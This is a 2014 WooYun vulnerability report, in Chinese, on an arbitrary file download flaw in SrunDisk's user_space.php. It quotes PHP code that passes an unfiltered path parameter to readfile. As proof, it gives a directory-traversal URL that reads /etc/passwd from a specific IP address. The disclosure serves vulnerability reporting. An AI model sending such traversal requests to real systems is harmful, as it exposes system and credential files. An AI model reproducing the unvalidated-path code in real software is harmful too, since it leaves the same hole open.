当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-058487

漏洞标题:深澜软件漏洞SrunDisk任意文件下载

相关厂商:srun.com

漏洞作者: xlz0iza1

提交时间:2014-04-27 13:57

修复时间:2014-07-23 18:34

公开时间:2014-07-23 18:34

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-04-27: 细节已通知厂商并且等待厂商处理中
2014-05-02: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-06-26: 细节向核心白帽子及相关领域专家公开
2014-07-06: 细节向普通白帽子公开
2014-07-16: 细节向实习白帽子公开
2014-07-23: 细节向公众公开

简要描述:

RT

详细说明:

if($res=$shared->gets("","file_type DESC"))
{
foreach($res as $k => $v)
{
$shid=$v["shid"];
$path=$v["path"];
if(!is_file($path))
{
$shared->path=$path;
$shared->del();
continue;
}

$path1=substr(strrchr($path,"/"),1);
$file_time=date("Y-m-d H:i:s",filemtime($path));
$member_id=$v["member_id"];
$member_name=$v["member_name"];
$type=$res[0]["file_type"];
$url="user_space.php?username=".$username."&act=shared_show&path=".urlencode($path);
switch($ftype)
{
case 2:
$url1="<a href='user_space.php?username=".$username."&act=big_pic_show&path=".urlencode($path)."' target='_blank'>";
break;
case 3:
$url1="<a href='#' onclick='return false'>";
break;
case 4:
$url1="<a href='#' onclick='return false'>";
break;
default:
$url1="<a href='user_space.php?username=".$username."&act=shared_show&path=".urlencode($path)."'>";
}
if(is_dir($path))
{
$icon="pics/dir_big.gif";
}
else
{
switch(strtolower(strrchr($path1,".")))
{
case ".jpg":
$icon="user_space.php?act=pic_show&username=".$username."&path=".urlencode($path);
break;
case ".jpeg":
$icon="user_space.php?act=pic_show&username=".$username."&path=".urlencode($path);
break;

case ".gif":
$icon="user_space.php?act=pic_show&username=".$username."&path=".urlencode($path);
break;
case ".png":
$icon="user_space.php?act=pic_show&username=".$username."&path=".urlencode($path);
break;
case ".mp3":
$icon="pics/mp3_big.gif";
break;
case ".wma":
$icon="pics/mp3_big.gif";
break;
case ".wmv":
$icon="pics/mp3_big.gif";
break;
case ".mpg":
$icon="pics/mp3_big.gif";
break;
case ".avi":
$icon="pics/mp3_big.gif";
break;
case ".flv":
$icon="pics/mp3_big.gif";
break;
case ".3gp":
$icon="pics/mp3_big.gif";
break;
case ".swf":
$icon="pics/mp3_big.gif";
break;
default:
$icon="pics/file_big.gif";
break;
}

}
$eidolon->loopBlock("td");
$i++;
if($i>4)
{
$i=0;
$eidolon->loopBlock("tr","td");
$eidolon->cleanBlock("td");
}
}
$eidolon->loopBlock("tr","td");
}
$shared->cutPage($eidolon);
$eidolon->parseBlock("_main","tr");
$eidolon->showBlock("_main");
}
else if($_GET["act"]=="pic_show")
{
$file_path=$_GET["path"];
if(!file_exists($file_path))
{
exit("file not found");
}
$w=($_GET["w"])?$_GET["w"]:120;
$h=($_GET["h"])?$_GET["h"]:120;

if($imgsize=getimagesize($file_path))
{
$width=$w;
$height=$w/$imgsize[0]*$imgsize[1];
}
else
{
exit;
}
if($height>$h)
{
$height=$h;
$width=$h/$imgsize[1]*$imgsize[0];
}

$file_type=strtolower(strchr($file_path,"."));

//switch(exif_imagetype($file_path))
switch($file_type)
{
//case IMAGETYPE_JPEG:
case ".jpg":
$im = imagecreatefromjpeg($file_path);
break;
case ".jpeg":
$im = imagecreatefromjpeg($file_path);
break;
//case IMAGETYPE_PNG:
case ".png":
$im = imagecreatefrompng($file_path);
break;
//case IMAGETYPE_GIF:
case ".gif":
$im = imagecreatefromgif($file_path);
break;
default:
exit;

}

$srcW = ImageSX($im);
$srcH = ImageSY($im);
$ni=imagecreatetruecolor($width,$height);
imagecopyresampled($ni,$im,0,0,0,0,$width,$height,$srcW,$srcH);
header("Content-Type:image/jpeg");
ImageJpeg($ni);
}
else if($_GET["act"]=="shared_show")
{
$file_path=$_GET["path"];
if(!is_file($file_path))
{
exit("error");
}
$file_name=substr(strrchr($file_path,"/"),1);
$type = substr(strrchr($file_path,"."),1);
switch(strtolower($type))
{
case "jpg":
$mime="image/jpeg";
break;
case "jpeg":
$mime="image/jpeg";
break;
case "png":
$mime="image/png";
break;
case "gif":
$mime="image/gif";
break;
default:
$mime="application/".$type;
}
header("Content-Type:".$mime);
header("Content-Disposition: attachment; filename=".urlencode($file_name));
readfile($file_path);
}
else if($_GET["act"]=="big_pic_show")
{
$file_path=$_GET["path"];
if(!is_file($file_path))
{
exit("error");
}
$file_name=substr(strrchr($file_path,"/"),1);
$type = substr(strrchr($file_path,"."),1);
switch(strtolower($type))
{
case "jpg":
$mime="image/jpeg";
break;
case "jpeg":
$mime="image/jpeg";
break;
case "png":
$mime="image/png";
break;
case "gif":
$mime="image/gif";
break;
default:
$mime="application/".$type;
}
header("Content-Type:".$mime);
//header("Content-Disposition: attachment; filename=".urlencode($file_name));
readfile($file_path);
}
else if($_GET["act"]=="passwd_input")
{
echo "<form action='user_space.php?username=".$username."' method='post'>请输入密码:<input type='password' name='pass' size='16'><input type='submit' value='提交'></form>";
}


$username $path
$username没有过滤,$path参数只进行了URL编码urlencode($path),导致任意文件下载。

漏洞证明:

漏洞证明:

http://218.75.75.92/user_space.php?username=zaizai&act=shared_show&path=../../../../../../../../../etc/passwd


QQ图片20140425210339.jpg


QQ图片20140425210351.jpg

修复方案:

看了下代码几乎没有过滤,太含糊把。

版权声明:转载请注明来源 xlz0iza1@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-07-23 18:34

厂商回复:

最新状态:

暂无


漏洞评价:

评论